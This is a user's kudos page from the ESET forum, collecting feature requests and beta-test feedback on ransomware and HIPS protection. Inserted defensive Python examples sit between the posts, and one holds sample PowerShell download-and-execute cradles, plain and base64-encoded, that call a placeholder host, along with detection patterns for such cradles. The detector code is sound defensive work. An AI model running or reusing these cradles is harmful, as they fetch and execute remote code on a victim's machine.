persian-boy

Kudos

  1. Upvote
    persian-boy gave kudos to nexon in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Please add a virtual keyboard for entering the password on screen with the mouse.
  2. Upvote
    persian-boy gave kudos to jems in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Separate scans for a vulnerability scan AND a rootkit scan, à la KTS.
  3. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add an option to the realtime scanner to block obfuscated PowerShell scripts. The option would be dependent upon the Win 10 AMSI option being enabled in the Eset GUI.
    Justification
    Microsoft added a like mitigation in the form of a Windows Defender Exploit Guard ASR mitigation effective with Win 10 1709. ASR mitigations are only effective if Windows Defender is enabled as the realtime scan engine.
    Further justification is Eset's failure to detect malware in a highly obfuscated PowerShell script in a Malware Research Group ad hoc test: https://www.mrg-effitas.com/research/current-state-of-malicious-powershell-script-blocking/
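As an added illustration of what "blocking obfuscated PowerShell" has to look at (this is example code written for this page, not ESET's detection logic and not part of AMSI itself), the script below scores a command line against a handful of well-known obfuscation patterns: -EncodedCommand blobs, [char] casting, -join and string-concatenation fragments, backtick insertion, format-operator reassembly and download cradles. The rule list, weights, the entropy cut-off and the threshold of 4 are assumptions chosen for the example; the three command lines are constructed, not real telemetry. The one non-obvious step is that an -EncodedCommand argument is decoded (base64 of UTF-16LE) and rescanned, so the IEX/DownloadString hidden inside it counts against the outer command.

```python
"""Heuristic scoring of PowerShell command lines for common obfuscation tricks.

Added illustration for the thread, not ESET's detection logic and not anything
AMSI itself does. In practice the text would arrive from an AMSI scan request or
a 4104 script-block event; here three command lines are constructed inline.
The rule list, weights and threshold are assumptions for the example.
"""
import base64
import math
import re

# -EncodedCommand payloads are base64 of UTF-16LE text; capture the blob so it
# can be decoded and rescanned instead of scored only by its outer appearance.
ENCODED_RE = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (rule name, pattern, weight). Weights are assumptions, not published values.
RULES = [
    ("encoded_command", ENCODED_RE, 3),
    ("iex_invoke", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("char_casting", re.compile(r"\[char\]\s*\d+", re.I), 2),            # [char]105 ...
    ("string_join", re.compile(r"-join\b", re.I), 1),                     # -join (...)
    ("format_operator", re.compile(r"[\")]\s*-f\b", re.I), 1),           # "{0}{1}" -f ...
    ("backtick_noise", re.compile(r"`[a-zA-Z]"), 1),                      # d`o`wnload
    ("concat_fragments", re.compile(r"['\"]\s*\+\s*['\"]"), 1),           # 'Wr'+'ite'
    ("reverse_string", re.compile(r"\[array\]::reverse", re.I), 2),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|net\.webclient", re.I), 2),
]
THRESHOLD = 4          # assumption: a score at or above this is treated as obfuscated
MIN_ENTROPY_LEN = 120  # only long command lines get the entropy rule


def shannon_entropy(text):
    """Bits per character; long base64 blobs sit well above ordinary cmdlet text."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_encoded_command(cmd):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmd, depth=0):
    """Sum rule weights over the command line, recursing into decoded payloads."""
    total, hits = 0, []
    for name, pattern, weight in RULES:
        if pattern.search(cmd):
            hits.append(name)
            total += weight
    if len(cmd) >= MIN_ENTROPY_LEN and shannon_entropy(cmd) > 4.8:
        hits.append("high_entropy")
        total += 1
    decoded = decode_encoded_command(cmd)
    if decoded is not None and depth < 2:          # bounded: nested encodings stop at 2
        inner_total, inner_hits = score(decoded, depth + 1)
        total += inner_total
        hits.extend("decoded:" + h for h in inner_hits)
    return total, hits


def is_obfuscated(cmd):
    return score(cmd)[0] >= THRESHOLD


# Constructed samples (not real telemetry).
BENIGN = r"Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Where-Object Length -gt 1MB"
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = "powershell -nop -w hidden -enc " + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
FRAGMENTED = "$c=-join([char]105,[char]101,[char]120); .$c ('Wr'+'ite-Ho`st 1')"

if __name__ == "__main__":
    for label, cmd in (("benign", BENIGN), ("encoded", ENCODED), ("fragmented", FRAGMENTED)):
        total, hits = score(cmd)
        print(f"{label:10} score={total:2} obfuscated={is_obfuscated(cmd)} hits={hits}")
```

The fragmented sample never contains the literal string "iex", which is exactly why a signature on the token alone misses it and why a scoring approach over several weak indicators is the usual compromise. Any such heuristic will false-positive on legitimate admin tooling that uses -EncodedCommand, which is why the post ties it to an opt-in setting.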
  4. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add a column showing PID number in the following logs after the noted existing log column headings:
    1. HIPS - Application
    2. Network - Source
    This is necessary to properly identify the origin for multiple same process occurrences such as svchost.exe. 
  5. Upvote
    persian-boy gave kudos to Samet Chan in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add - Dark Mode on ESET Nod32 would be great.
  6. Upvote
    persian-boy gave kudos to 0xDEADBEEF in ESET Endpoint Security 7 is available for evaluation   
    Yes I was running that exact file in VMWare with Windows 8 Pro. My files got encrypted immediately and the payload deleted itself after encryption is done.
    I've also tried to run exactly the same sample in a VMWare Windows 7 Pro image, and it also encrypted the file.
    I have sent you private msg with the sample I used
  7. Upvote
    persian-boy gave kudos to 0xDEADBEEF in ESET Endpoint Security 7 is available for evaluation   
    Unfortunately v7 with latest definition and all protection layers on fails to block this ransomware sample :
    SHA256: 683ea0257ab6310dc5a6a65acc63737259eb044f0a000ba58d63e8e75533ae72
    All files are encrypted despite ESET detected some ransom note files as Filecoder.FV
    From the livegrid information, it is already with some number of users
  8. Upvote
    persian-boy gave kudos to J.D. in ESET Endpoint Security 7 is available for evaluation   
    Unfortunately, disabling realtime protection causes the ransomware shield to be less effective because it does not then receive all the events from the file system.
  9. Upvote
    persian-boy gave kudos to 0xDEADBEEF in ESET Endpoint Security 7 is available for evaluation   
    Feedback so far:
    1. Seamless upgrade from versions 6.5, 6.6: tried to upgrade from EES 6.6 to 7.0, the upgrade process was smooth, and all settings were retained. Threat logs and the software version are correctly reported to ERA. The system is Windows 10 16299
    2. Anti-ransomware protection: The testing system is Windows 8.1 Pro in a virtual machine. First tried Cerber, and ransomware protection is effective (Beh.C1). Cerber is fairly old now, so I also tried 5~6 other recent ransomware samples which will encrypt files even in a virtual machine. Unfortunately, none of them were caught by the ransomware shield and files were encrypted. My testing methodology was to disable realtime protection and AMS and run the malware. The virtual system's key folders were pre-populated with documents and images. Of course one can argue that these samples can be detected by early layers like scanning...
    5&6. Process exclusions and hash exclusion: I tried a GandCrab sample, first adding its SHA1 to the exclusion list, and the realtime scan indeed skipped the detection. With AMS enabled this threat can still be detected post-execution. So I further added the executable to the process exclusion list, and AMS still detected it. Not sure if this is expected or not. UPDATE: I think GandCrab is a bit special, other samples will be successfully excluded
    Other issues: seems that in the settings, sometimes even if I don't change any options, there will be a confirmation popup asking if I want to discard current changes upon closing the setting window. This doesn't happen in all cases. On my side, the way to stably reproduce it is to navigate to "email client protection" page, and then to "web access protection" page, and then try to close the setting window.
    p.s. glad to see the maximize window button returns to the GUI, this makes touch screen operations less awkward
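To make the two points in the posts above concrete (J.D.'s remark that the shield is starved of file-system events once realtime protection is off, and the test setup of pre-populated document folders), here is a toy behavioural ransomware heuristic. This is example code added for this page, not ESET's Ransomware Shield and not code from any poster; the event stream is constructed, and the entropy threshold, burst size and window are assumptions. A single high-entropy write does not convict a process (a saved .docx is a compressed container and legitimately looks like ciphertext); a burst of distinct user files rewritten or renamed to a foreign extension by one PID does. The run() helper can withhold the file-system feed to show that the same heuristic then sees nothing at all.

```python
"""Toy behavioral ransomware heuristic fed with constructed file-system events.

Added illustration for the discussion, not ESET's Ransomware Shield logic.
Thresholds, entropy values and event fields are assumptions for the example.
"""
from collections import defaultdict, deque

DOC_EXTS = {".docx", ".xlsx", ".pdf", ".jpg", ".png", ".txt"}
HIGH_ENTROPY = 7.5   # bits per byte of the written buffer; ciphertext is ~8.0
BURST = 5            # distinct victim files from one PID inside WINDOW seconds
WINDOW = 2.0


def ext(path):
    dot = path.rfind(".")
    return path[dot:].lower() if dot >= 0 else ""


def looks_destructive(ev):
    """One event of the kind a file-encrypting payload produces."""
    if ev["op"] == "write":
        return ext(ev["path"]) in DOC_EXTS and ev["entropy"] >= HIGH_ENTROPY
    if ev["op"] == "rename":
        return ext(ev["path"]) in DOC_EXTS and ext(ev["new_path"]) not in DOC_EXTS
    return False


class BurstDetector:
    def __init__(self):
        self.recent = defaultdict(deque)   # pid -> deque of (ts, path)
        self.flagged = set()

    def feed(self, ev):
        """Return an alert dict the first time a PID crosses the burst threshold."""
        if ev["source"] != "fs" or not looks_destructive(ev):
            return None
        q = self.recent[ev["pid"]]
        q.append((ev["ts"], ev["path"]))
        while q and ev["ts"] - q[0][0] > WINDOW:   # slide the window
            q.popleft()
        victims = {p for _, p in q}
        if len(victims) >= BURST and ev["pid"] not in self.flagged:
            self.flagged.add(ev["pid"])
            return {"pid": ev["pid"], "image": ev["image"], "files": sorted(victims)}
        return None


def run(events, fs_events_delivered=True):
    """Replay events. With fs_events_delivered=False the file-system feed is withheld,
    i.e. the situation described when realtime protection is switched off."""
    det, alerts = BurstDetector(), []
    for ev in events:
        if ev["source"] == "fs" and not fs_events_delivered:
            continue
        alert = det.feed(ev)
        if alert:
            alerts.append(alert)
    return alerts


def fs(ts, pid, image, op, path, **extra):
    return {"source": "fs", "ts": ts, "pid": pid, "image": image, "op": op, "path": path, **extra}


DOCS = r"C:\Users\test\Documents"
# Constructed event stream: Word saves one file, Explorer deletes a temp file,
# then a dropper rewrites and renames six documents within one second.
EVENTS = [
    {"source": "proc", "ts": 0.0, "pid": 4242, "image": "invoice.exe", "op": "start", "path": ""},
    fs(0.3, 1800, "WINWORD.EXE", "write", DOCS + r"\report.docx", entropy=7.8),
    fs(0.4, 2900, "explorer.exe", "delete", DOCS + r"\~$report.tmp"),
]
for i, name in enumerate(["q1.xlsx", "budget.pdf", "photo.jpg", "notes.txt", "plan.docx", "old.png"]):
    t = 1.0 + 0.2 * i
    EVENTS.append(fs(t, 4242, "invoice.exe", "write", DOCS + "\\" + name, entropy=7.99))
    EVENTS.append(fs(t + 0.1, 4242, "invoice.exe", "rename", DOCS + "\\" + name,
                     new_path=DOCS + "\\" + name + ".locked"))

if __name__ == "__main__":
    print("feed on :", run(EVENTS))
    print("feed off:", run(EVENTS, fs_events_delivered=False))
```

With the feed on, the dropper is flagged on its fifth distinct file and the Word save is correctly ignored; with the feed off, the identical malicious sequence produces no alert, which is the effect the test methodology of disabling realtime protection has on any event-driven layer.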
  10. Upvote
    persian-boy gave kudos to rekun in ESET Endpoint Security 7 is available for evaluation   
    Hi
    1. seems to be ok
    Are there any detailed changelogs?
    I can't seem to find anything related to Dynamic Threat Defense. Is it not included here?
  11. Upvote
    persian-boy gave kudos to Peter Randziak in ESET Endpoint Security 7 is available for evaluation   
    Hello and welcome to the ESET Endpoint 7 BETA testing.
    Below you can find the promised list of main new features we would like to hear your experience with (you can post replies such as “1. O.K., 2. O.K., 3. failed with error XY,…”)
    1. Seamless upgrade from versions 6.5, 6.6 and even from version 5 by means of ERA or direct manual upgrade
    2. Anti-ransomware protection – please install it on the most trouble-causing PC in your company or on a system with high risk of infection, like in DMZ or with sensitive data
    3. Auto-update – please check if the Endpoints are being seamlessly upgraded to a new version once we release it
    4. Time-based Web control and Device control rules – set them up as needed with assigned time intervals and let us know whether they work as expected and configured
    5. Process exclusions – set them up (ideally for your backup software / agent) and observe if potential issues with it get resolved and if the backups are faster than before
    6. Try new type of exclusion by hash (SHA1) – exclude a file located in a user’s profile or on a mounted disk by its SHA1, the scanner should skip it.
    The new ESET Endpoint Security / ESET Endpoint Antivirus 7 BETA can be managed by ESET Remote Administrator 6.5 – however, the new features need to be configured locally for now, as the new ERA required to control them is, unfortunately, not yet prepared for a public BETA release.
    You can download the ESET Endpoint Security / ESET Endpoint Antivirus installation packages from http://ftp.nod.sk/~randziak/EP7_BETA/7.0.2065.0/
    The encryption passwords are 
    eea_nt32 "811a2cdea4fe138ec52a99e6e8df29233093581d"
    eea_nt64 "8777e163df9f633ed84832390d9e5faf0c5a8ed1"
    ees_nt32 "9b126754a071507aa5136dcb7f076a25d2a0262a"
    ees_nt64 "d9a1d0439889a77f78ad48c811df36bd3a247399"
    Those are SHA1 for the respective .msi packages, in case you would like to check them.

    In case you would like to report any additional issue, please use a separate topic in this forum for each one of them for easier navigation.
    Please do not share details about this program outside this sub-forum until the product is globally released.

    We are looking forward to your feedback and experience with the 7th generation of ESET Endpoint products.
    Thank you in advance, 
    Peter Randziak
  12. Upvote
    persian-boy gave kudos to Peter Randziak in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Hello guys,
    Ransomware Shield is a behavioral protection feature utilizing data from the ESET LiveGrid reputation system. 
    Regards, P.R.
  13. Upvote
    persian-boy gave kudos to Wolf Igmc4 in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add a behavior blocker, based on the reputation system of Eset. Yes, I said this some time ago, but if Eset doesn't add it, in the future, this will be a big problem.
  14. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    It actually used to do this prior to ver. 11. I believe this has something to do with Microsoft's decree to AV vendors that they can't interfere with the boot process in Win 10 ver. 1709. I am actually surprised that Eset even processes an Ask HIPS use in ver. 11 and instead, just auto allows it. I know it is doing so because it will slightly delay your boot time; something I thought wasn't supposed to happen on Win 10 ver. 1709.
    Again it is a bit peculiar that the HIPS default action is allow. However, it always has been this way. To be honest, I seriously doubt Eset will change it to block mode.
    A proper frame of reference for you is Eset first and foremost created the HIPS for its own internal use. As such, it really isn't designed to be user configurable other than to create a few exception rules. This is more so evident in the retail vers. of Eset. For example, Eset added file wildcard capability a while back for the Endpoint vers. but refuses to do so for the retail vers..
  15. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I explained this once to you. Eset has internal default rules and those rules take precedence over any user created rules.
    Also if an alert response is not received within a short period of time, Eset will auto allow the action. This comes into play for example with any ask rule that might be triggered during the boot process. Those will be allowed by the time the PC initializes, the desktop appears, and finally the Eset GUI is started. 
  16. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Nvidia in their "infinite security wisdom" created two .bat scripts they dumped in C:\Windows directory. Their startup service can run these .bat scripts if errors are encountered in their software as recovery procedures. So basically, you have to allow svchost.exe to run cmd.exe. Not the most secure thing to do if malware creates a malicious service. Hence my recommendation that file wildcard support is needed.
    There is also the issue of why the HIPS hasn't been updated to reflect Win 10's current ability to uniquely identify an individual svchost.exe service by process id. 
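Both this post and the earlier request for a PID column in the HIPS and Network logs come down to the same gap: "svchost.exe" in a log line tells you nothing until the PID is mapped back to the service(s) that instance hosts. The example below is added for this page (not ESET's code, not posted by anyone in the thread): it parses the output of `tasklist /svc`, the stock Windows command that lists each process with its hosted services, and joins it against log records that carry the PID column the post asks for. The tasklist output and the log records are constructed samples, including the Nvidia service name, so they illustrate the format rather than any particular machine. One caveat a practitioner needs: PIDs are reused, so the snapshot must be taken close to the logged event, and since Windows 10 1703 hosts with more than 3.5 GB of RAM run most services in their own svchost instance, which is what makes the PID a usable identifier in the first place.

```python
"""Resolve svchost.exe PIDs from HIPS/firewall-style log records to service names.

Added illustration for the thread; not ESET's code. The `tasklist /svc` output
and the log records below are constructed samples, not captured from a host.
"""
import re

# Constructed sample in the layout `tasklist /svc` prints: fixed-width image name,
# right-aligned PID, then a comma-separated service list that may wrap onto
# indented continuation lines.
SAMPLE = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    904 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
svchost.exe                    992 RpcEptMapper, RpcSs
svchost.exe                   1820 Schedule
svchost.exe                   2312 NVDisplay.ContainerLocalSystem
cmd.exe                       5120 N/A
"""

ROW = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<svcs>.*)$")


def split_services(field):
    field = field.strip()
    if not field or field == "N/A":
        return []
    return [s.strip() for s in field.split(",") if s.strip()]


def parse_tasklist_svc(text):
    """Return {pid: {"image": str, "services": [str, ...]}} from `tasklist /svc` text."""
    table, last = {}, None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Image Name") or line.startswith("="):
            continue
        if line[0].isspace() and last is not None:      # wrapped service list
            table[last]["services"].extend(split_services(line))
            continue
        m = ROW.match(line)
        if not m:
            continue
        pid = int(m.group("pid"))
        table[pid] = {"image": m.group("image"), "services": split_services(m.group("svcs"))}
        last = pid
    return table


def describe(pid, table):
    entry = table.get(pid)
    if entry is None:
        return f"PID {pid}: not in snapshot (process exited or PID reused; snapshot too late)"
    if not entry["services"]:
        return f"{entry['image']} (PID {pid}): no hosted services"
    return f"{entry['image']} (PID {pid}) hosts: {', '.join(entry['services'])}"


# Constructed log records shaped like the request: existing columns plus a PID column.
# Two different svchost instances starting cmd.exe look identical without it.
HIPS_LOG = [
    {"time": "2018-06-01 09:12:03", "application": r"C:\Windows\System32\svchost.exe",
     "pid": 2312, "operation": "Start new application", "target": r"C:\Windows\System32\cmd.exe"},
    {"time": "2018-06-01 09:12:05", "application": r"C:\Windows\System32\svchost.exe",
     "pid": 1820, "operation": "Start new application", "target": r"C:\Windows\System32\cmd.exe"},
]


def annotate(log, table):
    """Attach the resolved service names to each log record."""
    return [f"{rec['time']} {rec['application']} -> {rec['target']}: {describe(rec['pid'], table)}"
            for rec in log]


if __name__ == "__main__":
    snapshot = parse_tasklist_svc(SAMPLE)
    for line in annotate(HIPS_LOG, snapshot):
        print(line)
```

On a live machine the SAMPLE string would be replaced by the real output of `tasklist /svc` taken at the time of the alert; the two otherwise identical cmd.exe launches then resolve to different services, which is precisely the distinction a per-service HIPS rule needs.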
  17. Upvote
    persian-boy gave kudos to eternalromance in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Description: Add option to enforce firewall rules created on the spot until the PC is rebooted
    Detail: Please add an option to enforce firewall rules created on the spot until the PC is rebooted or powered off
  18. Upvote
    persian-boy gave kudos to Wolf Igmc4 in Future changes to ESET Internet Security and ESET Smart Security Premium   
    That's a good suggestion.
  19. Upvote
    persian-boy received kudos from Wolf Igmc4 in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Suggestion: Reputation scan
    A custom scan that scans the whole hard drive with LiveGrid and gets reputations for everything (DLL, EXE, ...) on the machine.
  20. Upvote
    persian-boy received kudos from Aryeh Goretsky in Future changes to ESET Internet Security and ESET Smart Security Premium   
    suggestion: Separate export and import settings or Hips
  21. Upvote
    persian-boy gave kudos to peteyt in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Description: More information in system cleaner
    Detail: I have mentioned this previously. System cleaner is the new tool in version 11 that alerts you to system settings that have been changed from default the idea being that they could have been changed by malware.
    The issue is they give no information on the actual setting just the type of setting. I tested this feature by clicking to change settings hoping I would be shown the changes and able to make a decision.
    What would make more sense is having a way to see the actual changes and a way to ignore certain changes that the user wants to keep. Many people change things themselves e.g Windows tweakers and this feature could cause issues if they change things without realising. This could always be a more advanced option disabled by default.
    If this cannot happen, at least have a log for this feature so that advanced users can see the changes made. If Eset is changing a Windows option it shouldn't be too hard to log the change somewhere. Also an undo feature might be handy, as when I tried it out hoping I would be given options Eset just changed them, and with no log I have no idea what got changed.
  22. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Yeah, I know about this.
    Just be careful with GitHub software. Being open source, it can be hacked. One of the major sources of nasty backdoors has been GitHub software.
  23. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    As far as anti-exec processing, there is one built into Win 10 - native SmartScreen. I have tested with a couple of unknown reputation files and each time got an alert from it when they tried to run. Eset let the files run w/o issue. Neither file was malicious but I prefer an option to disallow execution in this instance.
    The downside is native SmartScreen relies on "The Mark of the Web" remaining associated with the downloaded file. There are ways to "strip that off" of a download.
  24. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I did some of my own testing in regards to this business about the HIPS not detecting Farbar activity. For starters, I set the HIPS to Interactive mode and then ran Farbar.
    To begin with, Farbar will load and begin execution because you started it manually. However, the first attempt by Farbar to perform any activity the HIPS monitors for will cause an alert as shown by the below screen shot.
    Now if you create a .bat script and run Farbar by execution of the script, you will receive a HIPS alert about the startup of Farbar. Likewise, malware doesn't magically run by itself. Something has to execute it. 

  25. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I have run Farbar in the past and Eset HIPS in Auto or Safe mode will not alert because its a safe app.
    Are you saying that the HIPS in Interactive or Policy mode is not throwing an alert at Farbar startup time?